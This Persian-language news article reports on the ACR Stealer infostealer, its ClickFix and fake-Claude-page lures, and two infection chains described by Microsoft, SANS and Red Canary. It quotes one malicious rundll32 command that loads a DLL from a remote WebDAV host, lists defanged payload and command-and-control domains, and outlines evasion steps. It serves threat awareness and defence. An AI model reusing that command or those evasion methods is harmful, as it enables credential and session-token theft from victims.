بدافزار جدید و خطرناکی به نام ACR Stealer از ابتدای سال ۲۰۲۴ در حال ربودن اطلاعات حیاتی از شبکههای سازمانی است. این بدافزار که در دسته بدافزارهای سرقت اطلاعات طبقهبندی میشود، با نفوذ به حافظه مرورگرها، رمزهای عبور ذخیرهشده، توکنهای جلسات زنده و حتی فایلهای حساس از جمله اسناد PDF، فایلهای مایکروسافت ۳۶۵ و دادههای همگامسازیشده در OneDrive و SharePoint را به سرقت میبرد.
نکته شگفتانگیز در مورد این بدافزار روش نفوذ ساده اما هوشمندانه آن است: کاربر کافیست یک دستور کپی شده را در کادر Run ویندوز وارد کرده و اینتر بزند. مایکروسافت در گزارشی که روز پنجشنبه منتشر کرد، دو زنجیره اصلی تحویل این بدافزار را شرح داده است. تیم Defender Experts مایکروسافت که واحد مدیریت تشخیص تهدیدات این شرکت است، از اواخر آوریل تا اواسط ژوئن شاهد افزایش چشمگیر فعالیت ACR Stealer در محیطهای مشتریان بوده است. به گفته این تیم، کمپینهای مهاجمان با موفقیت از طعمههای ClickFix برای سرقت اعتبارنامههای مرورگر، توکنهای احراز هویت و اسناد حساس استفاده میکنند.
هر دو زنجیره تحویل با یک اعلان فریبنده شروع میشوند اما سپس از یکدیگر جدا میشوند. یکی از زنجیرهها آثاری روی دیسک باقی میگذارد و دیگری تقریباً به طور کامل در حافظه اجرا میشود. راهنمای رفع مشکل مایکروسافت به قربانیان توصیه میکند که توکنها را باطل کنند، نه فقط رمزهای عبور را تغییر دهند؛ زیرا مهاجم با داشتن توکن جلسه میتواند بدون نیاز به رمز عبور به حسابهای کاربری دسترسی داشته باشد.
بارگذاری در دل پیکسلها
بر اساس این گزارش، اعلان اولیه احتمالاً از طریق تبلیغات مخرب (malvertising) یا نتایج جستجوی دستکاریشده با تکنیکهای سئو به دست کاربر میرسد. زنجیره بدون فایل زمانی شروع میشود که دستور کپی شده فایل mshta.exe را اجرا کرده و محتوای HTA راه دور را دریافت میکند. یک لودر VBScript جاسازیشده از اشیاء COM برای رمزگشایی و اجرای PowerShell استفاده میکند. این مرحله یک شناسه منحصربهفرد برای قربانی میسازد، اعتبارسنجی گواهی را غیرفعال میکند و در نهایت payload نهایی را که در حافظه قرار دارد اجرا میکند.
آنچه در این مرحله دریافت میشود یک تصویر JPEG است که روی یک سرویس میزبانی تصویر آپلود شده و payload مخرب در پیکسلهای آن پنهان شده است. روالهای سفارشی در بدافزار این دادهها را استخراج، رمزگشایی و فشردهسازی میکنند و سپس به صورت انعکاسی اجرا میشوند. در ادامه، بدافزار به سراغ مرورگرهای Chrome و Edge میرود و پایگاههای داده Login Data و Web Data را میخواند. سپس از طریق DPAPI (رابط برنامهنویسی حفاظت از داده ویندوز) برای رمزگشایی رمزهای عبور، کوکیها و توکنهای ذخیرهشده استفاده میکند. فایلهای PDF موجود در پوشههای Desktop و Downloads نیز به سرقت میروند.
کلود جعلی، دروازهای برای نفوذ
برد دانکن، مدیر مرکز عملیات اینترنتی SANS، در تاریخ ۲۶ می یک عفونت ویندوزی را مستند کرد که به صفحهای جعلی با ظاهر کلود (Claude)، دستیار هوش مصنوعی شرکت Anthropic، مرتبط بود. این صفحه از طریق تبلیغات مخرب گوگل و با پنهانسازی پشت آدرسهای sites.google.com توزیع میشد. نکته جالب اینکه این صفحه بسته به سیستمعامل کاربر (مک یا ویندوز) دستورالعملهای متفاوتی را نمایش میداد.
مایکروسافت در گزارش خود نامی از این طعمه خاص نمیبرد، اما دو نشانگر ذکر شده در جدول Campaign 2 این شرکت یعنی creativecommunityinfo[.]art و enhanceblabber[.]cc به عنوان میزبان payload و سرور فرماندهی و کنترل (C2) شناسایی شدهاند. وبسایت The Hacker News هر دو دامنه را با زنجیره آلودگی مستند شده توسط دانکن مطابقت داد که هفت هفته زودتر از طریق زیردامنههای این آدرسها اجرا شده بود. خود گزارش مایکروسافت نیز به یادداشتهای دانکن به عنوان یکی از منابع ارجاع میدهد.
آن زنجیره همچنین یک فایل JPEG به اندازه ۶۲۸ کیلوبایت از سرویس میزبانی تصویر ImgBB دریافت کرد. دانکن این فایل را به عنوان بخشی از عفونت علامتگذاری کرد اما نتوانست دادههای جاسازیشدهای در آن پیدا کند. او نوشت: نمیتوانستم هیچ نشانه آشکاری از دادههای جاسازیشده پیدا کنم.
شرکت امنیتی Red Canary نیز یک ماه زودتر طعمههایی با برند Claude را ثبت کرده بود که ACR Stealer را از طریق صفحات جعلی Claude Code در GitLab مانند آدرس claude-desktop[.]gitlab[.]io تحویل میدادند.
زنجیره دوم: ردپایی روی دیسک
زنجیره اول مایکروسافت روی دیسک مینویسد که به مدافعان امنیتی اجازه میدهد کار بیشتری برای شناسایی و رفع تهدید انجام دهند. در این روش، دستور کپی شده یک فایل DLL را مستقیماً از یک اشتراک WebDAV از طریق HTTPS دریافت میکند. آدرس فایل شامل یک دایرکتوری GUID و یک نام فایل است که طوری طراحی شده شبیه یک فایل بیخطر به نظر برسد. مثال گزارش مایکروسافت فایلی با نام google.ct است.
Red Canary نیز در گزارش ماه مه خود، بر اساس اطلاعات فروردین ماه، دقیقاً همین الگو را توصیف کرده بود. نمونه دستور اجرا شده به این صورت بود:
C:\Windows\system32\rundll32.exe" \sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
دو تا از سه نوع مختلف بدافزار که توسط Defender Experts مشاهده شد از دستور pushd برای mount کردن اشتراک راه دور به عنوان یک درایو محلی موقت استفاده میکنند. این کار باعث میشود که payload از طریق مسیری که به نظر میرسد محلی است اجرا شده و شناسایی آن سختتر شود. مخفیترین نوع از این روش، فرآیند را در conhost.exe --headless میپیچد تا پنجره کنسول بسته شود و همچنین رشتههای مربوط به pushd، rundll32 و میزبان راه دور را با استفاده از بسط متغیر محیطی با تأخیر (delayed environment-variable expansion) پنهان میکند.
در ادامه یک اسکریپت PowerShell مبهمسازیشده اجرا میشود که یک فایل ZIP را در پوشهای با نامی بیآزار در مسیر %LocalAppData%\Temp (مثلاً LogiOptionsPlus) استخراج میکند. سپس یک فایل pythonw.exe همراه (bundled) اسکریپت پایتون را اجرا میکند تا هیچ پنجرهای روی صفحه نمایش داده نشود. نکته قابل توجه اینکه این نصبکننده نسخههای قدیمیتر را قبل از نصب پاک میکند، دقیقاً مانند یک بهروزرسان معمولی. نهایتاً بدافزار با استفاده از یک وظیفه زمانبندی شده مخفی (hidden scheduled task) در سیستم باقی میماند.
برای محافظت در برابر این تهدید، تیم امنیتی مایکروسافت توصیه میکند که کاربران سازمانی از راهکارهای پیشرفته شناسایی تهدید مانند Microsoft Defender for Endpoint استفاده کرده و آموزشهای لازم برای عدم اجرای دستورات ناآشنا در کادر Run را به کارکنان خود ارائه دهند. همچنین باطل کردن توکنهای جلسه (Token Revocation) پس از هر حادثه امنیتی یک اقدام حیاتی است.





